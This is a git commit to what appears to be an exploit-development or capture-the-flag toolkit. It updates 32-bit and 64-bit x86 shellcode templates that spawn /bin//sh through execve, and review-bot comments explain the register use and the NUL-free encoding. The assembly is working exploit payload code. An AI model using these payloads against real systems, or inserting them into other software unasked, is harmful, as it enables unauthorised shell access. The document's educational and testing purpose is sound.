authorMalfurious <m@lfurio.us>2023-01-15 08:06:42 -0500
committerMalfurious <m@lfurio.us>2023-01-15 10:12:48 -0500
commitf21e743212f02dbfb560fa74d983a7e156722d11 (patch)
tree920fc58ea7ec7896f8f4cf9ed48595785375b526
parentad106276e2935085f9201ffa65423032f8fcff6b (diff)
shellcode: Update /bin/sh shellcodes
The shell-spawning shellcodes are rewritten to address the following concerns:
- The array parameters to execve are now set properly, to valid arrays on the stack, instead of NULL pointers.
- The cdq instruction is no longer used to sign-extend the rax register, since it has not been producing the expected results in gdb.
- Labels, sections, and other file metadata are removed in order to support concatenation of shellcode samples to make more complex code.
Signed-off-by: Malfurious <m@lfurio.us>
-rw-r--r--templates/shellcode/examples/shell32.asm29
-rw-r--r--templates/shellcode/examples/shell64.asm36
2 files changed, 37 insertions, 28 deletions
diff --git a/templates/shellcode/examples/shell32.asm b/templates/shellcode/examples/shell32.asm
index 5ff2e12..6238469 100644
--- a/templates/shellcode/examples/shell32.asm
+++ b/templates/shellcode/examples/shell32.asm
@@ -1,15 +1,16 @@
-[SECTION .text]
-global _start
+; Originally based on https://www.exploit-db.com/shellcodes/46809
+; See shell64.asm for more details.
-; https://www.exploit-db.com/shellcodes/46809
-
-_start:
- xor ecx, ecx
- xor edx, edx
- push 0xb
- pop eax
- push ecx
- push 0x68732f2f
- push 0x6e69622f
- mov ebx, esp
- int 0x80
+; execve("/bin/sh", ["/bin/sh"], [])
+xor eax, eax
+xor ecx, ecx
+push ecx
+push 0x68732f2f
+push 0x6e69622f
+mov ebx, esp
+push ecx
+mov edx, esp
+push ebx
+mov ecx, esp
+mov al, 11
+int 0x80
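Review bot: The header comment `; execve("/bin/sh", ["/bin/sh"], [])` understates what the two `push` immediates actually build: the filename is `/bin//sh` (the doubled slash pads the string to eight bytes so neither immediate contains a NUL), argv[0] is that same pointer, and `edx` is deliberately aimed at the NULL that the second `push ecx` left just above argv, so envp is an empty array rather than the caller's environment. Suggest annotating those lines, e.g. `push 0x68732f2f ; "//sh"`, `push 0x6e69622f ; "/bin"`, `mov edx, esp ; envp = {NULL}, reuses argv's terminator` and `mov al, 11 ; SYS_execve (i386)`. Because envp is empty the spawned shell starts with no PATH or other inherited variables; whether that matters depends on the shell's built-in defaults, which this file cannot guarantee, so a one-line caveat near the header would save the next user a surprise. The encoding stays NUL-free as written, and with the section and `_start` removed the file is presumably assembled with `nasm -f bin`; stating that in the header would help.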
diff --git a/templates/shellcode/examples/shell64.asm b/templates/shellcode/examples/shell64.asm
index 2353b6f..3812c33 100644
--- a/templates/shellcode/examples/shell64.asm
+++ b/templates/shellcode/examples/shell64.asm
@@ -1,16 +1,24 @@
-[SECTION .text]
-global _start
+; Originally based on https://www.exploit-db.com/shellcodes/47008
-; https://www.exploit-db.com/shellcodes/47008
+; stack layout
+;
+; ┏━━━━━━━━━━━━━━┓
+; ┃ v
+; [ argv0, NULL ] "/bin//sh" NULL
+; ^ ^ ^
+; ┃ ┃ ┃
+; argv envp filename
-_start:
- xor rsi, rsi
- xor rdx, rdx
- push rsi
- mov rdi, 0x68732f2f6e69622f
- push rdi
- push rsp
- pop rdi
- mov al, 0x3b
- cdq
- syscall
+; execve("/bin/sh", ["/bin/sh"], [])
+xor rax, rax
+xor rsi, rsi
+mov rdi, 0x68732f2f6e69622f
+push rsi
+push rdi
+mov rdi, rsp
+push rsi
+mov rdx, rsp
+push rdi
+mov rsi, rsp
+mov al, 59
+syscall
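Review bot: `xor rax, rax` and `xor rsi, rsi` each carry a REX prefix that buys nothing; in 64-bit mode a 32-bit write zero-extends, so `xor eax, eax` and `xor esi, esi` zero the same registers in two bytes each instead of three, which matters for a sample meant to be concatenated into larger payloads. On the commit's `cdq` remark: `cdq` sign-extends `eax` into `edx` (the `rax`→`rdx` form is `cqo`), so what gdb showed was most likely the instruction's documented behaviour rather than a tool quirk; dropping it is still the right call since `rdx` is now loaded from `rsp`. The comment `execve("/bin/sh", ...)` should say `/bin//sh`, which is what `0x68732f2f6e69622f` spells, and `mov al, 59` deserves `; SYS_execve (x86-64)`. The stack-layout diagram's column alignment appears to have been lost in transit, so it is hard to tell from the listing alone which arrow belongs to which pointer; pairing each with the instruction that sets it (`rdi` after the first `push rdi`, `rdx` after the second `push rsi`, `rsi` after the second `push rdi`) would make the comment robust to reflow.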